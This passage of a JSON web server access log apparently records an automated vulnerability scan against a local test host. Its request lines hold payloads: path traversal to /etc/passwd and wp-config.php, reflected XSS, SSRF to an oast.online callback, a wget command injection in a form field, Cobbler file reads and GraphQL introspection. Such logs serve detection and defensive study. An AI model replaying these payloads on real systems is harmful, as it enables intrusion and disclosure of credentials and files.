"13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://c9v8hs0smpv8c6ag07h0cwd6mrzxftbbc.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/77 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hm/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27297MbLWSMK28ASPzbkr2bM9h5JR%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/spider.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 